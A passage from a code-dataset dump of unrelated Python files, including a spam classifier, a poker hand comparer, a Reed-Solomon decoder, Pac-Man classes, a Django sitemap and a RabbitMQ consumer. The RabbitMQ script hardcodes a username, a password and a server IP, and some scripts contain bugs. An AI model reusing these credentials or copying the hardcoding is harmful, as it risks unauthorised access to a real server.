FEATUER_NUM, NOT_INFO):\n for p in range(1, PLAY_NUM+1):\n NOT_INFO[str(p)] = []\n for j in range(FEATUER_NUM):\n NOT_INFO[str(p)].append(-1)\n","sub_path":"app/LSTM1205/createDataFunc/setFunc.py","file_name":"setFunc.py","file_ext":"py","file_size_in_byte":3511,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"494374368","text":"\"\"\"Python Spam Detector\nImplemented with Naive Bayes (MultiNomialNB) and AdaBoost.\nThe Sklearn Documentation notes that this class is suitable for \"classification with \ndiscrete features (e.g. word counts for text classification). The multinomial \ndistribution normally requires integer feature counts. However, in practice, \nfractional counts such as tf-idf may also work.\"\n\nThe preprocessed data set is taken from the UCI Machine Learning Repository. \nSpecifically, the Spambase Data Set: https://archive.ics.uci.edu/ml/datasets/spambase.\n\"\"\"\n\nfrom sklearn.naive_bayes import MultinomialNB\nfrom sklearn.ensemble import AdaBoostClassifier\nimport pandas as pd \nimport numpy as np \n\ndata = pd.read_csv('spambase/spambase.data').values\nnp.random.shuffle(data) #inplace shuffle of data (row) \n\n# first 48 columns is input \nX = data[:, :48]\ny = data[:, -1]\n\n# last 100 rows is test set \nX_train = X[:-100,]\ny_train = y[:-100,]\nX_test = X[-100:,]\ny_test = y[-100:,]\n\n# Instantiate object \nmodel = MultinomialNB()\nmodel.fit(X_train, y_train)\nprint(\"Classification rate for Naive Bayes: \", model.score(X_test, y_test))\n\n\n# Run same data on AdaBoost Classifier\nmodel = AdaBoostClassifier()\nmodel.fit(X_train,y_train)\nprint(\"Classification rate for AdaBoost: \", model.score(X_test, y_test))\n\n\n","sub_path":"SpamDetection/spamdetectornb.py","file_name":"spamdetectornb.py","file_ext":"py","file_size_in_byte":1285,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"458827615","text":"#cards = '2H 4D 3C 6S 5H'\n'''\npokers类的作用\n整理手牌顺序、判断手牌类型\n四个数字相同的牌按三条处理\n'''\nclass pokers():\n def __init__(self,name=None,cards=None):\n self.pokersType = {'散牌':1,'对子':2,'两对':3,\n '三条':4,'顺子':5,'同花':6,\n '同花顺':7}\n self.pokersNum = {'2':2,'3':3,'4':4,'5':5,\n '6':6,'7':7,'8':8,'9':9,\n 'T':10,'J':11,'Q':12,'K':13,\n 'A':14}\n self.pokersCol ={ 'S':4, #黑桃\n 'H':3, #红桃\n 'D':2, #方片\n 'C':1 #梅花 \n }\n\n self.name = name #持牌者名称\n self.cards = self.sortCards(cards) #所持手牌\n self.cardsNumList= []\n self.cardsColList = []\n self.cardsNumSet = {}\n self.cardsNumSetLen = 0\n self.cardsColSet = {}\n self.cardsColSetLen = 0\n \n self.cardsType = self.getCardsType(cards) #所持手牌类型\n\n\n\n def sortCards(self,cards):\n cardsList = cards.split(' ')\n cards = []\n for card in cardsList:\n cardTuple = (self.pokersNum[card[0]],self.pokersCol[card[1]])\n cards.append(cardTuple)\n cards.sort( key = lambda x : (x[0], x[1]) )\n self.cards =cards\n return cards\n \n def getCardsType(self,cards):\n cards = self.sortCards(cards)\n cardsNumList= []\n cardsColList = []\n cardsType = None\n \n for card in cards:\n cardsNumList.append(card[0])\n cardsColList.append(card[1])\n \n self.cardsNumList = cardsNumList\n self.cardsColList = cardsColList\n cardsNumSet = set(cardsNumList)\n cardsColSet = set(cardsColList)\n\n self.cardsNumSet = cardsNumSet\n self.cardsColSet = cardsColSet\n\n cardsNumSetLen = len(cardsNumSet)\n cardsColSetLen = len(cardsColSet)\n self.cardsNumSetLen = cardsNumSetLen\n self.cardsColSetLen = cardsColSetLen\n\n\n if cardsColSetLen == 1:\n isStraigh = True\n i = 0\n while i < 4:\n if cardsNumList[i+1] - cardsNumList[i] != 1:\n isStraigh = False\n break\n i += 1\n if isStraigh and cardsColSetLen==1: #同花顺\n cardsType = 7\n else:\n cardsType = 6 #同花\n\n else:\n #set长度为5可能为 散牌、顺子\n if cardsNumSetLen==5:\n isStraigh = True\n i = 0\n while i < 4:\n if cardsNumList[i+1] - cardsNumList[i] != 1:\n isStraigh = False\n break\n i += 1\n if isStraigh: #顺子\n cardsType = 5\n else:\n cardsType = 1 #散牌\n\n elif cardsNumSetLen== 4: #对子\n cardsType = 2\n \n else: #cardsNumSetLen==3 or 2 可能为两对或三条\n isTwoPairsTest = True\n for i in cardsNumSet:\n if cardsNumList.count(i) >= 3: #四个数字相同的牌按三条处理\n isTwoPairsTest = False\n break\n if isTwoPairsTest: #两对\n cardsType = 3 \n else: #三条\n cardsType = 4\n \n self.cardsType = cardsType\n return cardsType\n \n \n'''\npokersCmp类的作用\n比较两手牌的大小\n'''\nclass pokersCmp():\n def cmp_ReturnWinnerName(self,B_pokers,W_pokers):\n if B_pokers.cardsType > W_pokers.cardsType:\n return B_pokers.name\n elif B_pokers.cardsType < W_pokers.cardsType:\n return W_pokers.name\n else:\n cardsType = B_pokers.cardsType\n if cardsType == 7:\n return self.straightFlushCmp(B_pokers,W_pokers)\n elif cardsType == 6:\n return self.suitCmp(B_pokers,W_pokers)\n elif cardsType == 5:\n return self.straightCmp(B_pokers,W_pokers)\n elif cardsType == 4:\n return self.threeOfAKindCmp(B_pokers,W_pokers)\n elif cardsType == 3:\n return self.twoPairsCmp(B_pokers,W_pokers)\n elif cardsType == 2:\n return self.onePairsCmp(B_pokers,W_pokers)\n elif cardsType == 1:\n return self.cardCmp(B_pokers,W_pokers)\n \n\n def mainCmp(self,Input):\n B_name = Input[0:5]\n W_name = Input[22:27]\n B_cards = Input[7:21]\n W_cards = Input[29:43]\n output = 'Tie'\n\n B_pokers = pokers(B_name ,B_cards)\n W_pokers = pokers(W_name,W_cards)\n winner = self.cmp_ReturnWinnerName(B_pokers,W_pokers)\n if winner != 'Tie':\n output = winner + \" wins\"\n return output\n \n\n\n \n\n\n def straightFlushCmp(self,B_pokers,W_pokers):\n return self.cardCmp(B_pokers,W_pokers)\n\n def suitCmp(self,B_pokers,W_pokers):\n return self.cardCmp(B_pokers,W_pokers)\n def straightCmp(self,B_pokers,W_pokers):\n return self.cardCmp(B_pokers,W_pokers)\n\n def threeOfAKindCmp(self,B_pokers,W_pokers):\n B_cardsNumSet = B_pokers.cardsNumSet\n B_cardsNumList = B_pokers.cardsNumList\n B_num = None\n\n for i in B_cardsNumSet:\n if B_cardsNumList.count(i) >=3:\n B_num = i\n break\n \n W_cardsNumSet = W_pokers.cardsNumSet\n W_cardsNumList = W_pokers.cardsNumList\n W_num = None\n\n for i in W_cardsNumSet:\n if W_cardsNumList.count(i) >=3:\n W_num = i\n break\n \n if B_num > W_num:\n return B_pokers.name\n elif B_num < W_num:\n return W_pokers.name\n else:\n return 'Tie'\n \n\n def twoPairsCmp(self,B_pokers,W_pokers):\n return self.pairsCmp(B_pokers,W_pokers)\n def onePairsCmp(self,B_pokers,W_pokers):\n return self.pairsCmp(B_pokers,W_pokers)\n\n def pairsCmp(self,B_pokers,W_pokers):\n winner = None\n B_cardsNumSet = B_pokers.cardsNumSet\n B_cardsNumList = B_pokers.cardsNumList\n B_cardsNumCountDic = {}\n \n for i in B_cardsNumSet:\n B_cardsNumCountDic[i] = B_cardsNumList.count(i)\n\n W_cardsNumSet = W_pokers.cardsNumSet\n W_cardsNumList = W_pokers.cardsNumList\n W_cardsNumCountDic = {}\n\n for i in W_cardsNumSet:\n B_cardsNumCountDic[i] = B_cardsNumList.count(i)\n \n if B_pokers.cardsType == 4:\n B_num = None\n W_num = None\n for i in B_cardsNumSet:\n if B_cardsNumCountDic[i] >=3:\n B_num = i\n break\n for i in W_cardsNumSet:\n if W_cardsNumCountDic[i] >=3:\n W_num = i\n break\n if B_num > W_num:\n winner = B_pokers\n elif B_num < W_num:\n winner = W_pokers\n else:\n pass\n\n elif B_pokers.cardsType == 3 or B_pokers.cardsType == 2:\n B_paris = []\n B_one_cards = []\n\n for i in B_cardsNumSet:\n if B_cardsNumList.count(i) == 2:\n B_paris.append(i)\n else:\n B_one_cards.append(i)\n W_paris = []\n W_one_cards = []\n for i in W_cardsNumSet:\n if W_cardsNumList.count(i) == 2:\n W_paris.append(i)\n else:\n W_one_cards.append(i)\n \n B_paris.sort(reverse = True)\n W_paris.sort(reverse = True)\n B_one_cards.sort(reverse = True)\n W_one_cards.sort(reverse = True)\n\n \n for i in range(len(B_paris)):\n if B_paris[i] > W_paris[i]:\n winner = B_pokers\n break\n elif B_paris[i] < W_paris[i]:\n winner = W_pokers\n break\n else:\n pass\n \n if winner == None:\n for i in range(len(B_one_cards)):\n if B_one_cards[i] > W_one_cards[i]:\n winner = B_pokers\n break\n elif B_one_cards[i] < W_one_cards[i]:\n winner = W_pokers\n break\n else:\n pass\n else:\n pass\n\n if winner == None:\n return 'Tie'\n else:\n return winner.name\n\n \n\n\n def cardCmp(self,B_pokers,W_pokers):\n\n B_cardsNumList = B_pokers.cardsNumList\n W_cardsNumList = W_pokers.cardsNumList\n\n winner = 'Tie'\n i = 4\n while i >= 0:\n if B_cardsNumList[i] < W_cardsNumList[i]:\n winner = W_pokers.name\n break\n elif B_cardsNumList[i] > W_cardsNumList[i]:\n winner = B_pokers.name\n break\n else:\n i -= 1\n return winner\n\n \n\n\n\n'''\npokers = pokers()\nprint(pokers.showPokersType(cards = '2H 3H 4H 5H 6H'))\n\nB_pokers =pokers('Black','2H 3H 6H 4H 5H')\nW_pokers =pokers('White','3D 7D 5D 6D 4D')\npokersCmp = pokersCmp()\nwinner = pokersCmp.cmp_ReturnWinnerName(B_pokers,W_pokers)\nprint(winner)\n\n'''\n\n\n\n","sub_path":"第3课-测试驱动开发-TexasHoldem/TexasHoldem.py","file_name":"TexasHoldem.py","file_ext":"py","file_size_in_byte":8164,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"486392342","text":"# an encoder and decoder for Reed-Solomon codes with coefficients in Z/p for a prime p\n# decoder uses the Berlekamp-Welch algorithm\n\n# for solving a linear system\nfrom linearsolver.linearsolver import someSolution\n\nfrom finitefield.finitefield import FiniteField\nfrom finitefield.polynomial import polynomialsOver\n\n\ndef makeEncoderDecoder(n, k, p):\n if not k <= n <= p:\n raise Exception(\"Must have k <= n <= p but instead had (n,k,p) == (%r, %r, %r)\" % (n,k,p))\n\n Fp = FiniteField(p)\n Poly = polynomialsOver(Fp)\n maxE = ((n - k) // 2) # maximum allowed number of errors\n\n # message is a list of integers at most p\n def encode(message):\n if not all(x < p for x in message):\n raise Exception(\"Message is improperly encoded as integers < p. It was:\\n%r\" % message)\n\n def row(i, b):\n return [Fp(i ** (j)) for j in range(k)] + [Fp(b)]\n system = [row(i, message[i]) for i in range(k)]\n \n interpolated = someSolution(system, freeVariableValue=1)\n thePoly = Poly(interpolated)\n print(\"Original message is:\")\n print(message)\n print(\"The polynomial encoding the message is:\")\n print(thePoly)\n return [thePoly(Fp(i)) for i in range(n)]\n\n\n def solveSystem(encodedMessage, debug=True):\n for e in range(maxE, 0, -1):\n ENumVars = e\n QNumVars = e+k\n def row(i, x, r):\n return ([r * x**j for j in range(ENumVars)] +\n [-1 * x**j for j in range(QNumVars)] +\n [-r * x**ENumVars]) # the \"extended\" part of the linear system\n\n system = ([row(i, a, b) for (i, (a,b)) in enumerate(encodedMessage)])\n # Add one more row in the end ensure coefficient of x^e in E(x) is 1\n\n if debug:\n print(\"\\nSystem of equations is:\\n\\n\")\n for row in system:\n print(\"\\t%r\" % (row,))\n\n solution = someSolution(system, freeVariableValue=1)\n E = Poly([solution[j] for j in range(ENumVars)] + [Fp(1)])\n Q = Poly([solution[j] for j in range(ENumVars, len(solution))])\n\n if debug:\n print(\"\\nReduced system is:\\n\\n\")\n for row in system:\n print(\"\\t%r\" % (row,))\n\n print(\"Solution is %r\" % (solution,))\n print(\"Q is %r\" % (Q,))\n print(\"E is %r\" % (E,))\n\n P, remainder = Q.__divmod__(E)\n if remainder == 0:\n return Q, E\n\n raise Exception(\"found no divisors!\")\n\n\n def decode(encodedMessage):\n encodedMessage = [[Fp(i), encodedMessage[i]] for i in range(len(encodedMessage))]\n Q,E = solveSystem(encodedMessage)\n\n Pcoefs, remainder = Q.__divmod__(E)\n if remainder != 0:\n raise Exception(\"Q is not divisibly by E!\")\n P = Poly(Pcoefs)\n print(\"Decoded polynomial r(x) = Q(x) / E(x) is: \")\n print(P)\n return [P(Fp(i)) for i in range(k)]\n \n\n\n return encode, decode, solveSystem\n","sub_path":"welchberlekamp.py","file_name":"welchberlekamp.py","file_ext":"py","file_size_in_byte":2947,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"303054472","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom maze import Maze\n\nclass MovableCharacter(object):\n \n lastSeenCounter = 10\n \n def canGo(self,direction):\n movement = Maze.Directions[direction]\n return not self.maze.isWall(int(self.x+self.speed*movement[0])%self.maze.height,int(self.y+self.speed*movement[1])%self.maze.width)\n \n def canMove(self):\n return not self.maze.isWall(int(self.x+self.speed*self.dx)%self.maze.height,int(self.y+self.speed*self.dy)%self.maze.width)\n \n def chase(self):\n if list(self.lastSeen) == []:\n return False\n if self.chasing == None or not(self.chasing in list(self.lastSeen.keys())):\n self.chasing = list(self.lastSeen.keys())[0]\n coord = self.lastSeen[self.chasing][0]\n direction = self.maze.direction(self.getCoordinates(),coord)\n self.setDirection(direction)\n \n def decreaseLastSeen(self):\n toDelete = []\n for ls in self.lastSeen.keys():\n self.lastSeen[ls][1] -= 1\n if self.lastSeen[ls][1]==0:\n toDelete.append(ls)\n for ls in toDelete:\n self.lastSeen.pop(ls)\n \n def getCoordinates(self):\n return (int(self.x),int(self.y))\n \n def getDirection(self):\n return Maze.ReverseDirections[(self.dx,self.dy)]\n\n def updateSeen(self, name, coord):\n self.lastSeen[name] = [coord,MovableCharacter.lastSeenCounter]\n\n def setDirection(self,direction):\n if not (direction is None):\n movement = Maze.Directions[direction]\n self.dx = movement[0]\n self.dy = movement[1]\n return True\n\n def setPosition(self,x,y):\n self.x = x\n self.y = y\n \n def display(self):\n pass\n\n def flee(self):\n pass\n \n def move(self):\n pass\n \n\n \nclass PacMan(MovableCharacter):\n \n def __init__(self,x,y,speed,maze,name=\"PacMan\"):\n self.name = name\n self.x = x\n self.y = y\n self.dx = 0\n self.dy = 0\n self.speed = speed\n self.maze = maze\n self.lastSeen = {}\n self.seuilCloseDistance = 10\n self.chasing = None\n self.eatenPills = 0\n if (self.maze.takePill(self.x,self.y)) : self.eatenPills+=1\n self.hasPower = False\n \n def isAlone(self):\n closest,dist = self.maze.closestAmong(self.getCoordinates(),self.lastSeen)\n res = dist>self.seuilCloseDistance\n return res\n \n def gotoPill(self):\n coord1 = self.getCoordinates()\n coord2 = self.maze.closestPill(coord1)\n if coord2 is None:\n return False\n direction = self.maze.direction(coord1,coord2)\n self.setDirection(direction)\n return True\n\n def move(self):\n if self.canMove():\n self.x = (self.x+self.speed*self.dx)%self.maze.height\n self.y = (self.y+self.speed*self.dy)%self.maze.width\n if self.maze.takePill(int(self.x),int(self.y)):\n self.eatenPills += 1\n \n\nclass Ghost(MovableCharacter):\n \n def __init__(self,x,y,speed,maze,name=\"PacMan\"):\n self.name = name\n self.x = x\n self.y = y\n self.dx = 0\n self.dy = 0\n self.speed = speed\n self.maze = maze\n self.lastSeen = {}\n self.chasing = None\n self.isEaten = False\n \n def isAlone(self):\n return list(self.lastSeen.keys())==[]\n \n def move(self):\n if self.canMove():\n self.x = (self.x+self.speed*self.dx)%self.maze.height\n self.y = (self.y+self.speed*self.dy)%self.maze.width","sub_path":"TP/TP3Sources/characters.py","file_name":"characters.py","file_ext":"py","file_size_in_byte":3646,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"275564353","text":"import pika\r\nimport time\r\n#设置RabbitMq登录的用户名及密码\r\ncredentials = pika.PlainCredentials('newnew', 'rabbitmq123')\r\n#RabbitMq连接,只是连接一个Socket\r\nconnection = pika.BlockingConnection(pika.ConnectionParameters(\r\n '182.61.17.151',credentials=credentials))\r\n#建立RabbitMQ协议的通道,实例化一个channel\r\nchannel = connection.channel()\r\n\r\n#声明hello的消息队列\r\nchannel.queue_declare(queue='hello')\r\n\r\n#ch是channel的实例,method发送消息是的信息,properties属性,body是消息(bytes格式)\r\ndef callback(ch, method, properties, body):\r\n print(\"received msg...start processing....\",body)\r\n# time.sleep(20)\r\n #print(\" [x] Received %r\" % ch,method, properties, body)\r\n print(\" [x] msg process done....\",body)\r\n\r\n#队列消费,queue队列名,callback表示一收到消息时调用函数\r\nchannel.basic_consume(callback,\r\n queue='hello',\r\n no_ack=True)\r\n\r\nprint(' [*] Waiting for messages. To exit press CTRL+C')\r\n#开始消费\r\nchannel.start_consuming()\r\n#消费端消费消息没给服务的回馈\r\n","sub_path":"demo_rabbitmq/test_receive1.py","file_name":"test_receive1.py","file_ext":"py","file_size_in_byte":1102,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"503483195","text":"import re\r\nimport queue\r\n\r\n\r\nclass WhooziJuicy:\r\n\r\n def _init_(self,people):\r\n self.lists=people\r\n \r\n def Entry_Rules(self):\r\n #filter by digits next to alphabet ***Elders must enter the premises first*\r\n New_sorted_List=sorted(self.lists,key=lambda x:int(re.findall(r'\\d+$',x)[0]))\r\n New_sorted_List.reverse()\r\n\r\n #People must stand in a queue\r\n Q_IN_queue=queue.Queue()\r\n\r\n #filter the queue by alphebet\r\n for item in range(len(New_sorted_List)-1):\r\n \r\n \r\n if int(New_sorted_List[item][1:])==int(New_sorted_List[item+1][1:]):\r\n \r\n array=[]\r\n array.append(New_sorted_List[item])\r\n array.append(New_sorted_List[item+1])\r\n\r\n #sort by Alphabet\r\n array.sort()\r\n New_sorted_List[item]=array[0]\r\n New_sorted_List[item+1]=array[1]\r\n \r\n\r\n \r\n \r\n for item in New_sorted_List:\r\n #**No under 18 persons are allowed**\r\n #select the age of the person and check if the person is allowed or not\r\n if int(item[1:]) < 18 :\r\n print (\"This person is not allowed \",item)\r\n elif int(item[1:]) == 90 :\r\n print (\"This nightclub is not able to assist this person\",item)\r\n else:\r\n #All those who are allowed\r\n Q_IN_queue.put(item)\r\n \r\n \r\n \r\n while not Q_IN_queue.empty():\r\n print(\"Person \",Q_IN_queue.get(),\"Enters the premises\")\r\n \r\n \r\n \r\n \r\n","sub_path":"KMC_Test/KMC.py","file_name":"KMC.py","file_ext":"py","file_size_in_byte":1680,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"124523856","text":"from datetime import datetime\nfrom django.conf import settings\nfrom django.core.urlresolvers import reverse\nfrom article.models import Article\nfrom photos.models import PhotoAlbum\nfrom .SitemapEntity import SitemapEntity\n\n\nclass Sitemap:\n \"\"\"Класс для генерации карты сайта\"\"\"\n\n siteHost = 'http://k-71.ru'\n\n today_lastmod = ''\n\n def __init__(self):\n self.today_lastmod = datetime.today().strftime('%Y-%m-%d')\n\n def generate(self):\n resultSitemap = \"\"\"\n \n \n \"\"\"\n siteRoot = SitemapEntity()\\\n .set_priority(1.0)\\\n .set_lastmod(self.today_lastmod)\\\n .set_url(self.siteHost + '/')\\\n .get()\n\n resultSitemap += siteRoot\n resultSitemap += self.get_albums_urls().strip()\n resultSitemap += self.get_articles_urls().strip()\n resultSitemap += self.get_static_urls().strip()\n\n resultSitemap += ''\n\n f = open(settings.BASE_DIR + '/templates/sitemap.xml', 'w')\n f.write(resultSitemap.strip())\n f.close()\n\n def get_static_urls(self):\n urls = ''\n\n static_urls = (\n '/events/',\n '/beginners/',\n '/memorandum/'\n )\n \n for url in static_urls:\n urls += SitemapEntity()\\\n .set_url(self.siteHost + url)\\\n .set_lastmod(self.today_lastmod)\\\n .set_priority(0.8)\\\n .get()\n\n return urls\n\n def get_articles_urls(self):\n urls = ''\n\n urls += SitemapEntity()\\\n .set_url(self.siteHost + reverse('article:index'))\\\n .set_lastmod(self.today_lastmod)\\\n .set_priority(0.8)\\\n .get()\n\n articlesResult = Article\\\n .objects\\\n .all()\\\n .only('date', 'slug')\\\n .order_by('-date')\n\n for article in articlesResult:\n urls += SitemapEntity()\\\n .set_url(self.siteHost + reverse('article:detail', kwargs={'slug': article.slug}))\\\n .set_lastmod(article.date.strftime('%Y-%m-%d'))\\\n .set_priority(0.6)\\\n .get()\n\n return urls\n\n def get_albums_urls(self):\n urls = ''\n\n urls += SitemapEntity()\\\n .set_url(self.siteHost + reverse('albums:index'))\\\n .set_lastmod(self.today_lastmod)\\\n .set_priority(0.8)\\\n .get()\n\n articlesResult = PhotoAlbum\\\n .objects\\\n .all()\\\n .only('date', 'slug')\\\n .order_by('-date')\n\n for article in articlesResult:\n urls += SitemapEntity()\\\n .set_url(self.siteHost + reverse('albums:detail', kwargs={'slug': article.slug}))\\\n .set_lastmod(article.date.strftime('%Y-%m-%d'))\\\n .set_priority(0.6)\\\n .get()\n\n return urls","sub_path":"classes/Sitemap/Sitemap.py","file_name":"Sitemap.py","file_ext":"py","file_size_in_byte":3261,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"230497712","text":"import sys\nimport random\nfrom optparse import OptionParser, OptionGroup\nimport collections\nimport pysam\n\n\nparser = OptionParser()\nparser.add_option(\"--bam\",dest=\"bam\",help=\"A bam file as input\")\n(options, args) = parser.parse_args()\n\n#file=\"/Volumes/Volume_4/analysis/pcr-non-pcr/bams/Dsim-PCRfree-rep1.filter.sort.bam\"\nfile=options.bam\ncounter=collections.defaultdict(lambda:0)\nsamfile = pysam.Samfile( file, \"rb\" )\nfor ar in samfile:\n name1=samfile.getrname(ar.tid)\n name2=samfile.getrname(ar.rnext)\n #if not ar.is_read1:\n # continue\n if name1 == name2:\n continue # discard those with equal id\n\n key=tuple(sorted([name1,name2]))\n counter[key]+=1\n \n\nitems=[(k[1],k[0]) for k in counter.items()]\nitems=reversed(sorted(items))\n\nfor i in items:\n print(i[1],i[0])\n\n ","sub_path":"users/robert/mapstat.py","file_name":"mapstat.py","file_ext":"py","file_size_in_byte":807,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"651205173","text":"import datetime\n\n\ndef currentTime():\n now = datetime.datetime.now()\n currentTime = now.strftime(\"%Y-%m-%d %H:%M:%S\")\n return currentTime\n\n\ndef check_expires(lastUpdate, expires):\n if lastUpdate == 'Not found':\n compare = True\n else:\n expires_format = datetime.datetime.strptime(\n lastUpdate, \"%Y-%m-%d %H:%M:%S\")\n compare_date = expires_format + datetime.timedelta(days=expires)\n current_date = datetime.datetime.now()\n\n compare = compare_date < current_date\n # print(compare)\n return compare # compare result\n # 過期或Not found為true\n","sub_path":"cgu_crawl/getTime.py","file_name":"getTime.py","file_ext":"py","file_size_in_byte":610,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"399587513","text":"\nimport pandas as pd#import pandas module as pd \nimport matplotlib.pyplot as plt #import plotting function\n#read a dataset\ncomp=pd.read_csv(\"C:\\\\Users\\\\jeeva\\\\Downloads\\\\R assignment\\\\decision tree\\\\Company_Data.csv\")\n#change bad=0 medium=1 good=2 in shelveloc column\ndef tochange(i):\n if i=='Bad':\n return 0\n if i=='Medium':\n return 1\n if i=='Good':\n return 2\ncomp['ShelveLoc']=comp['ShelveLoc'].apply(tochange)\n\n#convert salesRanges values to some unique values \ndef toconv(x):\n if x=='[0-1.0]':\n return 0\n if x=='[1-2.0]':\n return 1\n if x=='[2-3.0]':\n return 2\n if x=='[3-4.0]':\n return 3\n if x=='[4-5.0]':\n return 4\n if x=='[5-6.0]':\n return 5\n if x=='[6-7.0]':\n return 6\n if x=='[7-8.0]':\n return 7\n if x=='[8-9.0]':\n return 8\n if x=='[9-10.0]':\n return 9\n if x=='[10-11.0]':\n return 10\n if x=='[11-12.0]':\n return 11\n if x=='[12-13.0]':\n return 12\n if x=='[13-14.0]':\n return 13\n if x=='[14-15.0]':\n return 14\n if x=='[15-16.0]':\n return 15\n if x=='[16-17.0]':\n return 16\n \n#Change categorical to numeical\ncomp.Urban[comp.Urban=='Yes']=1\ncomp.Urban[comp.Urban=='No']=0\ncomp.US[comp.US=='Yes']=1\ncomp.US[comp.US=='No']=0\n\ncomp.Sales.max()\n#they give sales ranges\nSales_ranges=[\"[{0}-{1}]\".format(Sales,Sales+1.0)for Sales in range(0,17,1)]\nSales_ranges#we identify sales ranges\ncount_Sales_ranges=len(Sales_ranges)#count sales ranges\n\n#count the sales ranges values ex:[9-10.0]=53 counts [16-17.0]=2counts\ncomp['Salesranges_c']=pd.cut(x=comp['Sales'],bins=count_Sales_ranges,labels=Sales_ranges)\nSales_len=comp['Salesranges_c'].value_counts()\n\ncomp_range=pd.DataFrame(Sales_len).reset_index()\n#create a column with ranges and count values of sales_ranges\ncomp_range.columns=['Salesranges_c','count']\ncomp_range\n\n#plotting sales ranges values\nplt.bar(comp_range['Salesranges_c'],comp_range['count'])\nplt.show()\n\n#create column to change particular ranges to numerical for identifying\ncomp['Sales_out']=comp['Salesranges_c'].apply(toconv)#call toconv function\n#create column change numerical data to categorical data\ncomp['sale']=comp['Sales_out'].replace([0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16],['A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q'])\n#########Converted to Categorical datas#####\n\nimport numpy as np#for mathematical operation\nfrom sklearn.model_selection import train_test_split #split a train and test data\n#inputs are first and output as last in different dataframe\ncomp1=comp[['CompPrice','Income','Advertising','Population','Price','ShelveLoc','Age','Education','Urban','US','sale']]\ncolnames=list(comp1.columns)\npred=colnames[0:10] #predict a input columns\ntarg=colnames[10] #output as target\n\n#split the data \ntrain,test = train_test_split(comp1,test_size = 0.2)\n\n#import decision tree\nfrom sklearn.tree import DecisionTreeClassifier\n\n#model prepared by decision tree classifier \nmodel = DecisionTreeClassifier(criterion = 'entropy')\nmodel.fit(train[pred],train[targ]) #fitt values to input to output\npreds = model.predict(test[pred]) #predict a model with test input\npd.Series(preds).value_counts() #count predictions\n\npd.crosstab(test[targ],preds)#cross tab for mismatch function\nnp.mean(preds==test.sale) # 0.075 for gini: 0.1625 for entropy\n#I 13 #G 13 #J 11\n#E 8 #L 8 #F 6\n#K 4 #N 3 #A 3\n#C 3 #H 2 #M 2\n#D 2 #B 2","sub_path":"decision tree/com.py","file_name":"com.py","file_ext":"py","file_size_in_byte":3522,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"272348077","text":"\"\"\"shodai URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/2.0/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\n\nimport notifications.urls\nfrom django.conf import settings\nfrom django.conf.urls import url\nfrom django.conf.urls.static import static\nfrom django.urls import path, include\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.views.generic import TemplateView\nfrom django.templatetags.static import static as staticfiles\nfrom django.utils.translation import ugettext_lazy as _\nfrom material.admin.sites import site\nfrom graphene_django.views import GraphQLView\nfrom .schema import schema\n\n\n# optional\n###################################################\nsite.site_header = _('Shodai')\nsite.site_title = _('Shodai')\nsite.main_bg_color = '#088A3F'\nsite.login_bg_color = '#088A3F'\nsite.main_hover_color = 'black'\n\nsite.favicon = staticfiles('../static/others/favicon.ico')\nsite.profile_picture = staticfiles('../static/others/shodai-logo.png')\nsite.profile_bg = staticfiles('../static/others/white.jpg')\nsite.login_logo = staticfiles('../static/others/shodai-logo.png')\nsite.logout_bg = staticfiles('../static/others/white.jpg')\n##################################################\n\nurlpatterns = [\n path('', include('order.urls')),\n path('', include('customer_service.urls')),\n path('', include('product.urls')),\n path('', include('producer.urls')),\n path('', include('retailer.urls')),\n path('', include('user.urls')),\n path('', include('offer.urls')),\n path('', include('coupon.urls')),\n path('', include('utility.urls')),\n # path('', include('search.urls')),\n path('admins/', include('shodai_admin.urls')),\n path('admin/', include('material.admin.urls')),\n path('notifications/', include(notifications.urls, namespace='notifications')),\n path('ckeditor/', include('ckeditor_uploader.urls')),\n\n # Landing\n url(r'^$', TemplateView.as_view(template_name='landing/index.html')),\n url(r'^download/app', TemplateView.as_view(template_name='landing/download.html')),\n\n # Graphql\n url(r'^graphql', csrf_exempt(GraphQLView.as_view(graphiql=True, schema=schema))),\n]\n\nif settings.DEBUG:\n urlpatterns += static(settings.STATIC_URL,\n document_root=settings.STATIC_ROOT)\n urlpatterns += static(settings.MEDIA_URL,\n document_root=settings.MEDIA_ROOT)\n","sub_path":"shodai/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2891,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"578035657","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Mar 4 20:23:11 2021\n\n@author: JO20993\n\"\"\"\nclass AUV(object):\n def __init__(self, \n latlon=(0.0,0.0),\n depth=0.0,\n speed_knots=0.0,\n heading=0.0,\n rudder_position=0.0,\n engine_speed='STOP',\n engine_direction='AHEAD',\n datum=(0.0,0.0)):\n\n self.latlon = latlon\n self.depth = depth\n self.speed_knots = speed_knots\n self.heading = heading\n self.rudder_position = 